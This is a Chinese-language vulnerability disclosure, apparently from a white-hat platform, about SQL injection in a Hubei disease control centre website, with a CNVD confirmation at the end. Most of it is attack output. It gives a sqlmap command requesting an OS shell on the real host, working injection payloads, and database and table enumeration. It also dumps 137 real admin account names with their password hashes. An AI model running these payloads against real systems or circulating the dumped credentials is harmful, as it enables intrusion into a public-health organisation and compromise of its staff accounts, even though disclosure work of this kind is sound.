2015-04-10: 细节已通知厂商并且等待厂商处理中 2015-04-14: 厂商已经确认,细节仅向厂商公开 2015-04-24: 细节向核心白帽子及相关领域专家公开 2015-05-04: 细节向普通白帽子公开 2015-05-14: 细节向实习白帽子公开 2015-05-29: 细节向公众公开
湖北省疾病预防控制中心某站sql注入,可getshell,权限挺大的,内网没兴趣了
C:\Users\\Desktop\sqlmap-master>python sqlmap.py -u "http://hbcdc.cn/index.php/common-vote.html?id=1" --os-shell
blindsql: POST [id => and(1=1)] 100% http://hbcdc.cn/index.php/common-vote.html?id=1)blindsql: GET [cid => and(1=1)] 85% http://hbcdc.cn/index.php/index-enewsContent.html?cid=7)blindsql: GET [bid => and(1=1)] 11% http://hbcdc.cn/index.php/index-enewsList.html?bid=16&id=15)
eb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11available databases [6]:[*] information_schema[*] mysql[*] performance_schema[*] project_jikong[*] project_jkdq[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11current user: 'root@localhost'current database: 'project_jikong'available databases [6]:[*] information_schema[*] mysql[*] performance_schema[*] project_jikong[*] project_jkdq[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11Database: project_jikong[96 tables]+----------------------+| jk_access || jk_ad || jk_addcontact || jk_adddoctor || jk_adddownload || jk_addhistory || jk_addiframe || jk_addjxjy || jk_addkeshi || jk_addkjqb || jk_addnews || jk_addpage || jk_addpage2 || jk_addpage3 || jk_addphoto || jk_addprice || jk_addproduct || jk_addtable || jk_addvideo || jk_addzjxx || jk_addzp || jk_addzxdc || jk_admin || jk_adminmodule || jk_admintopnav || jk_archives || jk_archives_feedback || jk_arctype || jk_attribute || jk_book || jk_brand || jk_cart || jk_category || jk_channel || jk_checkinfo || jk_collect_cache || jk_collect_goods || jk_collect_node || jk_configtype || jk_enews || jk_enewstype || jk_faq || jk_filehash || jk_flink || jk_flinktype || jk_goldvote || jk_goods || jk_goods_attr || jk_goods_images || jk_goodstype || jk_images || jk_ip_check || jk_kf_form || jk_mallorder || jk_member || jk_member_addr || jk_member_article || jk_member_feedback || jk_member_relatives || jk_msg || jk_myadtype || jk_node || jk_order_action || jk_order_goods || jk_order_info || jk_pay_type || jk_performance || jk_press || jk_product_ext || jk_push_data || jk_pv || jk_region || jk_resume || jk_resume_academic || jk_resume_family || jk_resume_paper || jk_resume_school || jk_resume_science || jk_resume_work || jk_role || jk_role_user || jk_shipping || jk_shipping_type || jk_sites || jk_sms_check || jk_softform || jk_sysconfig || jk_tsjb || jk_user_grant || jk_votea || jk_voteext || jk_votepoll || jk_voteq || jk_votetype || jk_wxld || jk_wxldtype |+----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11Database: project_jikongTable: jk_ad[13 columns]+-------------+----------------------+| Column | Type |+-------------+----------------------+| arctype | smallint(8) || height | smallint(6) || html | text || id | int(11) unsigned || intro | varchar(30) || name | varchar(20) || overdue | date || overduehtml | text || siteid | smallint(3) unsigned || status | tinyint(1) || type | varchar(10) || url | varchar(200) || width | smallint(6) |+-------------+----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11Database: project_jikongTable: jk_admin[14 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| administrator | tinyint(1) || email | char(30) || id | int(10) unsigned || loginip | varchar(20) || logintime | int(11) unsigned || pwd | char(32) || role_read | text || role_write | text || siteid | varchar(255) || status | tinyint(1) || typeid | text || uname | char(20) || userid | char(30) || usertype | float unsigned |+---------------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 4371=4371 AND (6481=6481 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1) AND SLEEP(5) AND (2550=2550---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0.11Database: project_jikongTable: jk_admin[137 entries]+-----------+---------+----------------------------------+---------+---------------+| userid | uname | pwd | email | administrator |+-----------+---------+----------------------------------+---------+---------------+| admin | 京伦 | 3dfbe89e06ab378feba321b01f4d3e2d | <blank> | 1 || lyf_admin | 管理员 | 3cf108a4e0a498347a5a75a792f23212 | <blank> | 1 || test | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 卫生监测所 | <blank> | d11cfc843cf8cc0287dcb019d19c2310 | <blank> | 0 || 舆论监测 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 院办 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 党办 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 财务处 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 人教处 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 监察室 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 工会 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 质管室 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 生物办 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 传防所 | <blank> | da976758089bb2ab48893a05f6f5c8df | <blank> | 0 || 血研所 | <blank> | ec40cc7df116c5a91c5029856c76ca73 | <blank> | 0 || 安评中心 | <blank> | 642c56654ffd4057919a366592badb5a | <blank> | 0 || 慢病所 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 健教所 | <blank> | 493e1278d7bcccdd84906cbbed37acf7 | <blank> | 0 || 总务后勤处 | <blank> | 6800e8641393e7976f9de5d73c3c6aae | <blank> | 0 || 武汉市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 江岸区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 江汉区 | <blank> | f495ed23a05c4c0ee20607b9b5d9f545 | <blank> | 0 || 硚口区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 汉阳区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 武昌区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 青山区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 洪山区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 东西湖区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 汉南区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 蔡甸区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 江夏区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄陂区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 新洲区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄石市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄石港区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 下陆区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 铁山区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 阳新县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 大冶市 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 十堰市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 茅箭区 | <blank> | 7a242f57739dadc6eb3f748e2e8852f5 | <blank> | 0 || 张湾区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 郧县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 郧西县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 竹山县 | <blank> | dd37ae4f3497d35fb99f460e42caa1b7 | <blank> | 0 || 竹溪县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 房县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 丹江口市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 宜昌市 | <blank> | 5035006ca5d6209cc8580064473d7642 | <blank> | 0 || 西陵区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 伍家岗区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 点军区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 猇亭区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 夷陵区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 远安县 | <blank> | b07d6731b744a952f925c71601125634 | <blank> | 0 || 兴山县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 秭归县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 长阳县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 五峰县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 宜都市 | <blank> | bcdb7786b940b542d7a57791e53f6cab | <blank> | 0 || 当阳市 | <blank> | 967d567d832132850a0ea59b45075d72 | <blank> | 0 || 枝江市 | <blank> | bc4d26a91a9eb2a6ea1e2c217762642f | <blank> | 0 || 襄阳市 | <blank> | 38ee6a9bbc2c6d0860dd73384bd0c327 | <blank> | 0 || 襄城区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 樊城区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 襄州区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 南漳县 | <blank> | d34a3cfc05e367c4bc52e6d562bb60ca | <blank> | 0 || 谷城县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 保康县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 老河口市 | <blank> | 7750028eaf606d7a74f37c0b71b6c666 | <blank> | 0 || 枣阳市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 宜城市 | <blank> | aeb08f8ed7bfb3f05878eedb51148a68 | <blank> | 0 || 鄂州市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 梁子湖区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 华容区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 鄂城区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 荆门市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 东宝区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 掇刀区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 京山县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 沙洋县 | <blank> | 709624e7e0c56e5aaf13de41136bb65c | <blank> | 0 || 钟祥市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 孝感市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 孝南区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 孝昌县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 大悟县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 云梦县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 应城市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 安陆市 | <blank> | 80f1af79cd5bf0a354d2e9cb672e5b68 | <blank> | 0 || 汉川市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 荆州市 | <blank> | d950d397fa2057a1b01ad2d96cbe0a62 | <blank> | 0 || 沙市区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 荆州区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 公安县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 监利县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 江陵县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 石首市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 洪湖市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 松滋市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄冈市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄州区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 团风县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 红安县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 罗田县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 英山县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 浠水县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 蕲春县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 黄梅县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 麻城市 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 武穴市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 咸宁市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 咸安区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 嘉鱼县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 通城县 | <blank> | da70c317d67c464fa004aa382da55d52 | <blank> | 0 || 崇阳县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 通山县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 赤壁市 | <blank> | d03c2f0f9063a67c18ff050acf886b08 | <blank> | 0 || 随州市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 曾都区 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 广水市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 随县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 恩施州 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 恩施市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 利川市 | <blank> | 8b4289c4a99ce3c9c3bfac1a94dbd591 | <blank> | 0 || 巴东县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 宣恩县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 咸丰县 | <blank> | fbceaea07f735c33d49c5b668039965c | <blank> | 0 || 来凤县 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 鹤峰县 | <blank> | af7a2c8ee4b1ec3f03f8bb2c5e66da1e | <blank> | 0 || 仙桃市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 潜江市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 天门市 | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0 || 神农架林区 | <blank> | 44e9e6ba412407eb920941f5519a8416 | <blank> | 0 || 西塞山区 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 信息所 | <blank> | 6ef096b1c33aeb0c0b595f5cb2296ba0 | <blank> | 0 || 建始县 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 || 测试 | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0 |+-----------+---------+----------------------------------+---------+--------------
内网没有提权的欲望了。
过滤
危害等级:高
漏洞Rank:13
确认时间:2015-04-14 18:11
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
暂无
